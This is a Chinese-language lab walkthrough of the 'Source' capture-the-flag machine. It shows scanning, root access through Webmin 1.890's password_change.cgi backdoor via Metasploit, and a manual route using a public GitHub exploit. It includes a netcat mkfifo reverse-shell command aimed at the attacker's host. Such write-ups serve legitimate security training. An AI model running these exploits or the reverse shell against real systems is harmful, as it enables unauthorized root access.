Source
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/Source]
└─$ sudo netdiscover -i eth1 -r 10.1.1.0/24
Currently scanning: 10.1.1.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.1.1.1 00:50:56:c0:00:01 1 60 VMware, Inc.
10.1.1.153 00:0c:29:ba:e7:46 1 60 VMware, Inc.
10.1.1.254 00:50:56:ee:68:5e 1 60 VMware, Inc.
利用Kali Linux的netdiscover工具识别目标主机IP地址为10.1.1.153
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Source]
└─$ sudo nmap -sS -sV -sC -p- 10.1.1.153 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-10 22:36 EST
Nmap scan report for bogon (10.1.1.153)
Host is up (0.0013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b74cd0bde27b1b15722764562915ea23 (RSA)
| 256 b78523114f44fa22008e40775ecf287c (ECDSA)
|_ 256 a9fe4b82bf893459365becdac2d395ce (ED25519)
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 00:0C:29:BA:E7:46 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.56 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、10000(http)
获得Shell
浏览器访问10000端口,被重定向到https, 为用户登录界面。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Source]
└─$ curl -k https://10.1.1.153:10000/robots.txt
User-agent: *
Disallow: /
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Source]
└─$ searchsploit MiniServ
Exploits: No Results
Shellcodes: No Results
MiniServ没有相关的漏洞可被利用。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Source]
└─$ nikto -h https://10.1.1.153:10000
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.1.1.153
+ Target Hostname: 10.1.1.153
+ Target Port: 10000
---------------------------------------------------------------------------
+ SSL Info: Subject: /O=Webmin Webserver on source/CN=*/emailAddress=root@source
Ciphers: TLS_AES_256_GCM_SHA384
Issuer: /O=Webmin Webserver on source/CN=*/emailAddress=root@source
+ Start Time: 2023-03-10 22:40:36 (GMT-5)
---------------------------------------------------------------------------
+ Server: MiniServ/1.890
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'auth-type' found, with contents: auth-required=1
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie redirect created without the secure flag
+ Cookie redirect created without the httponly flag
+ Cookie testing created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server is using a wildcard certificate: *
+ Hostname '10.1.1.153' does not match certificate's names: *
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ MiniServ - This is the Webmin Unix administrator. It should not be running unless required.
+ OSVDB-44056: /sips/sipssys/users/a/admin/user: SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.
+ /ht_root/wwwroot/-/local/httpd$map.conf: WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /local/httpd$map.conf: WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /..\..\..\..\..\..\temp\temp.class: Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version.
+ OSVDB-3092: /css/: This might be interesting...
用SQL注入语句试图绕过用户登录认证,在尝试几次后,返回:
Error - Access denied for 10.1.1.143. The host has been blocked because of too many authentication failures.
msf6 > search webmin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution
1 auxiliary/admin/webmin/file_disclosure 2006-06-30 normal No Webmin File Disclosure
2 exploit/linux/http/webmin_file_manager_rce 2022-02-26 excellent Yes Webmin File Manager RCE
3 exploit/linux/http/webmin_package_updates_rce 2022-07-26 excellent Yes Webmin Package Updates RCE
4 exploit/linux/http/webmin_packageup_rce 2019-05-16 excellent Yes Webmin Package Updates Remote Command Execution
5 exploit/unix/webapp/webmin_upload_exec 2019-01-17 excellent Yes Webmin Upload Authenticated RCE
6 auxiliary/admin/webmin/edit_html_fileaccess 2012-09-06 normal No Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
7 exploit/linux/http/webmin_backdoor 2019-08-10 excellent Yes Webmin password_change.cgi Backdoor
Interact with a module by name or index. For example info 7, use 7 or use exploit/linux/http/webmin_backdoor
msf6 > use exploit/linux/http/webmin_backdoor
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_backdoor) > show options
Module options (exploit/linux/http/webmin_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 10000 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to liste
n on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path to Webmin
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (Unix In-Memory)
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/webmin_backdoor) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(linux/http/webmin_backdoor) > set LHOST 10.1.1.143
LHOST => 10.1.1.143
msf6 exploit(linux/http/webmin_backdoor) > set LPORT 5555
LPORT => 5555
msf6 exploit(linux/http/webmin_backdoor) > set SRVHOST 10.1.1.143
SRVHOST => 10.1.1.143
msf6 exploit(linux/http/webmin_backdoor) > set RHOSTS 10.1.1.153
RHOSTS => 10.1.1.153
msf6 exploit(linux/http/webmin_backdoor) > run
[*] Started reverse TCP handler on 10.1.1.143:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.1.1.143:5555 -> 10.1.1.153:60834) at 2023-03-11 03:35:16 -0500
id
uid=0(root) gid=0(root) groups=0(root)
得到了root shell,但似乎有些问题,不能更换目录
root@source:/usr/share/webmin/# cd /root
cd /root
root@source:~# ls -alh
ls -alh
total 36K
drwx------ 5 root root 4.0K Jun 26 2020 .
drwxr-xr-x 24 root root 4.0K Jun 26 2020 ..
-rw------- 1 root root 44 Jun 26 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 3 root root 4.0K Jun 26 2020 .gnupg
drwxr-xr-x 3 root root 4.0K Jun 26 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K Jun 26 2020 .ssh
-rw-r--r-- 1 root root 25 Jun 26 2020 root.txt
root@source:~# cat root.txt
cat root.txt
THM{UPDATE_YOUR_INSTALL}
root@source:~#
手动方法获得Shell
查询互联网关于Miniserv 1.890的exploit:
https://github.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Source/WebMin-1.890-Exploit-unauthorized-RCE-master]
└─$ python exploit.py 10.1.1.153 10000 id
--------------------------------
______________ _____ __
/ ___/_ __/ | / _/ | / /
\__ \ / / / /| | / // |/ /
___/ // / / ___ |_/ // /| /
/____//_/ /_/ |_/___/_/ |_/
--------------------------------
WebMin 1.890-expired-remote-root
<h1>Error - Perl execution failed</h1>
<p>Your password has expired, and a new one must be chosen.
uid=0(root) gid=0(root) groups=0(root)
</p>
curl: (56) OpenSSL SSL_read: error:0A000126:SSL routines::unexpected eof while reading, errno 0
发现命令可以被正确执行
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Source/WebMin-1.890-Exploit-unauthorized-RCE-master]
└─$ python exploit.py 10.1.1.153 10000 which nc
--------------------------------
______________ _____ __
/ ___/_ __/ | / _/ | / /
\__ \ / / / /| | / // |/ /
___/ // / / ___ |_/ // /| /
/____//_/ /_/ |_/___/_/ |_/
--------------------------------
WebMin 1.890-expired-remote-root
<h1>Error - Perl execution failed</h1>
<p>Your password has expired, and a new one must be chosen.
</p>
curl: (56) OpenSSL SSL_read: error:0A000126:SSL routines::unexpected eof while reading, errno 0
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Source/WebMin-1.890-Exploit-unauthorized-RCE-master]
└─$ python exploit.py 10.1.1.153 10000 'which nc'
--------------------------------
______________ _____ __
/ ___/_ __/ | / _/ | / /
\__ \ / / / /| | / // |/ /
___/ // / / ___ |_/ // /| /
/____//_/ /_/ |_/___/_/ |_/
--------------------------------
WebMin 1.890-expired-remote-root
<h1>Error - Perl execution failed</h1>
<p>Your password has expired, and a new one must be chosen.
/bin/nc
</p>
curl: (56) OpenSSL SSL_read: error:0A000126:SSL routines::unexpected eof while reading, errno 0
命令需要加上引号,接下来看如何获得shell
但是尝试各种获得shell的语句都失败,
──(kali㉿kali)-[~/Desktop/Vulnhub/Source/WebMin-1.890-Exploit-unauthorized-RCE-master]
└─$ python exploit.py 10.1.1.153 10000 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.1.1.143 5555 >/tmp/f"
--------------------------------
______________ _____ __
/ ___/_ __/ | / _/ | / /
\__ \ / / / /| | / // |/ /
___/ // / / ___ |_/ // /| /
/____//_/ /_/ |_/___/_/ |_/
--------------------------------
WebMin 1.890-expired-remote-root
<h1>Error - Perl execution failed</h1>
<p>Your password has expired, and a new one must be chosen. at /usr/share/webmin/password_change.cgi line 12.
</p>
curl: (56) OpenSSL SSL_read: error:0A000126:SSL routines::unexpected eof while reading, errno 0